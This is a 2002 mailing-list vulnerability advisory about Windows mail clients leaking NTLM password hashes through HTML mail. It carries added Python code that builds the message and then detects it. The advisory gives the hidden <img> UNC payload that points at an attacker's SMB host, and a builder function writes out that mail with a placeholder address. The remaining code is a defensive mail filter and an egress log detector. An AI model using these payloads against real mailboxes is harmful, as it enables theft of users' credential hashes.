Hijacking the hashes : multiple windows mail clients vulnerability
From: overclocking_a_la_abuela@hotmail.com
Date: 07/03/02
Date: 3 Jul 2002 16:34:26 -0000
From: <overclocking_a_la_abuela@hotmail.com>
To: vuln-dev@securityfocus.com
Hi men !

Some time ago, Windows 2000 was kicked with a vulnerability that allowed an attacker to force a telnet session to an external server. The telnet client tried to validate by sending the hashes of the user... This could be exploited with a simple javascript "open.window("telnet://
HTML formatted mail, or with the very rude method of a link pointing to a URL using the telnet scheme. Microsoft patched it and now Windows 2000 asks you if you want to send your password,.... emmm, no thanks ! ;-)

So, what about if there was another method to force a user on a Windows box to send you his hashes, without his knowledge, without using any interactive method, no javascript, no ActiveX, no lame social engineering technique... only HTML ?

Here you have another flaw that is present on almost every Windows box that can be exploited to obtain the user's password challenge/response hashes.

OK, that's what we have found :

Everybody knows that if a Windows machine wants to access an SMB resource, it always tries to connect first using the password of the user logged in. This "feature" is transparent to the user, so he never gets prompted with something like : "WARNING: you are about to send your password...".

Simply send an HTML formatted mail message that includes this code :

1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img src="\\\\external_IP\\resource">.

To make it "invisible" reduce the size of the "image" to the minimum.

On mail clients that work with the IE engine both methods seem to work : Outlook, Outlook Express,...

Any other web mail system, when using IE, will be forced to send hashes ( tested with Outlook Web Access, Hotmail, ... ) unless the mail web server does any kind of filtering on the HTML code.

On Eudora the first technique will work only if IE is selected as viewer, and the second one will work in both cases.

An attacker only has to send you an e-mail as described before and wait for your response with a network monitor ( LC3 in sniffer mode works fine for this purpose ).

Windows 2000 SP2, fully patched, will be assimilated unless you force strong authentication ( not on default installation ).

Of course a tightened firewall denying outgoing traffic through port TCP 139 will prevent this, but the problem is there and Windows users are exposed to the easiest way to steal their hashes : by e-mail.

This vulnerability has been found by :
HUGO VÁZQUEZ CARAMÉS and TONI CORTÉS.
www.infohacking.com 2002
Barcelona
SPAIN
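The message described in the post, and the server-side HTML filtering the post says would stop it, as an added example (editor's code, not the advisory's): it builds a mail carrying both <img> forms shrunk to 1x1, then scans every text/html part for resource references that name a UNC host. The attacker host 203.0.113.10 and the share name "pub" are placeholders; tags other than <img>, forward-slash UNC paths and the numeric-entity (&#92;) spelling of a backslash are the editor's extensions of the two forms in the post, on the assumption that the client resolves them the same way.

```python
"""Added example (editor's code, not from the advisory): build the HTML mail
described in the post with both <img> forms, then run the kind of server-side
HTML filter the post says would stop it.

Placeholders: attacker host 203.0.113.10 (RFC 5737 documentation range) and
share name 'pub'. Tags other than <img> are the editor's extension of the
advisory's two forms, on the assumption that the client fetches them too."""
import re
from email.message import EmailMessage
from html.parser import HTMLParser

ATTACKER_HOST = "203.0.113.10"   # placeholder, not a real attacker


def build_mail(host: str, share: str = "pub") -> EmailMessage:
    """HTML mail carrying the advisory's two payload forms, each 1x1 so the
    'image' is effectively invisible to the reader."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "hi"
    msg.set_content("hello")
    html = (
        "<html><body>hello"
        f'<img src="file://\\\\{host}\\{share}" width="1" height="1">'  # 1st form
        f'<img src="\\\\{host}\\{share}" width="1" height="1">'         # 2nd form
        "</body></html>"
    )
    msg.add_alternative(html, subtype="html")
    return msg


# Attributes whose value the client fetches. img/src is the advisory's case;
# the rest are assumed to behave the same way (editor's extension).
FETCH_ATTRS = {
    "img": ("src", "lowsrc", "dynsrc"),
    "iframe": ("src",), "frame": ("src",), "script": ("src",),
    "link": ("href",), "input": ("src",), "embed": ("src",),
    "object": ("data",), "bgsound": ("src",),
    "body": ("background",), "table": ("background",), "td": ("background",),
}

# A value that names a UNC host: optional file: scheme, two or more slashes
# or backslashes, then the host. Forward-slash UNC paths are treated like
# backslash ones (assumption: Windows path APIs accept both separators).
UNC_RE = re.compile(r"^\s*(?:file:)?[\\/]{2,}([^\\/\s]+)", re.IGNORECASE)


def unc_host(value: str):
    """Return the host a UNC-style reference points at, or None."""
    m = UNC_RE.match(value)
    if not m:
        return None
    host = m.group(1)
    if re.fullmatch(r"[A-Za-z]:", host):   # file:///C:/... is a local path
        return None
    return host


class UncRefFinder(HTMLParser):
    """Collect (tag, attribute, host) for every fetchable UNC reference.
    HTMLParser unescapes attribute values, so &#92;&#92;host is caught too."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:          # tag and name arrive lowercased
            if value is None or name not in FETCH_ATTRS.get(tag, ()):
                continue
            host = unc_host(value)
            if host:
                self.hits.append((tag, name, host))


def scan_html(html: str):
    p = UncRefFinder()
    p.feed(html)
    p.close()
    return p.hits


def scan_mail(msg: EmailMessage):
    """Scan every text/html part; a non-empty result means the message would
    make an IE-engine client authenticate to the named host."""
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits.extend(scan_html(part.get_content()))
    return hits


if __name__ == "__main__":
    for tag, attr, host in scan_mail(build_mail(ATTACKER_HOST)):
        print(f"<{tag} {attr}> -> UNC host {host}")
```

A filter of this kind belongs on the web mail server or mail gateway rather than in the client, since the client will have started the SMB connection before the user sees anything; whether a flagged host is external is a separate decision, made against the organisation's own address ranges.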
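The firewall point at the end of the post, turned into a detection, as an added example (editor's code, not the advisory's): it reads firewall log lines and flags SMB session attempts from internal hosts to external addresses, grouping internal clients by the external host they all reached, which is the pattern a mass-mailed message produces. TCP 445 is added alongside the post's TCP 139 because Windows 2000 also tries direct-hosted SMB on that port. The log format, the sample lines and the RFC 1918 definition of "internal" are constructed for this example.

```python
"""Added example (editor's code, not from the advisory): flag outbound SMB
session attempts from internal hosts to external addresses in firewall logs.

The advisory names TCP 139 (NetBIOS session service); TCP 445 (direct-hosted
SMB, which Windows 2000 also tries) is added here. The log format and the
sample lines are constructed, and 'internal' is assumed to mean RFC 1918
space plus loopback and link-local."""
import ipaddress
import re

SMB_PORTS = {139, 445}

# Assumed internal address space. Python's is_private is deliberately not
# used: it also classifies the documentation ranges used below as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed log format: "<ts> <ACTION> tcp <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+tcp\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: one workstation reached on 139 and 445, a legitimate
# internal share, a web request, a blocked attempt from a second workstation,
# and a line that does not parse.
SAMPLE_LOG = """\
2002-07-03T16:35:01 ACCEPT tcp 10.0.0.17:1062 -> 203.0.113.10:139
2002-07-03T16:35:01 ACCEPT tcp 10.0.0.17:1063 -> 203.0.113.10:445
2002-07-03T16:35:02 ACCEPT tcp 10.0.0.17:1064 -> 10.0.0.5:139
2002-07-03T16:35:04 ACCEPT tcp 10.0.0.17:1065 -> 198.51.100.7:80
2002-07-03T16:36:10 DROP tcp 10.0.0.23:1100 -> 203.0.113.10:139
garbage line that does not parse
"""


def is_internal(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return any(a in n for n in INTERNAL_NETS)


def parse_line(line: str):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def smb_egress(lines):
    """(ts, src, dst, dport, action) for every SMB session attempt that leaves
    the internal network. DROP lines are kept on purpose: a blocked attempt
    still tells you which client opened the message."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits.append((rec["ts"], rec["src"], rec["dst"], rec["dport"], rec["action"]))
    return hits


def victims_by_target(hits):
    """Group internal sources by external target: one outside host collecting
    from several internal clients is the mass-mail pattern."""
    out = {}
    for _, src, dst, _, _ in hits:
        out.setdefault(dst, set()).add(src)
    return out


if __name__ == "__main__":
    found = smb_egress(SAMPLE_LOG.splitlines())
    for h in found:
        print(*h)
    for dst, srcs in victims_by_target(found).items():
        print(f"{dst}: {len(srcs)} internal client(s)")
```

The egress rule the post recommends should cover 445 as well as 139; the DROP entries it then produces are the cheapest indicator that a message carrying such a reference reached a mailbox.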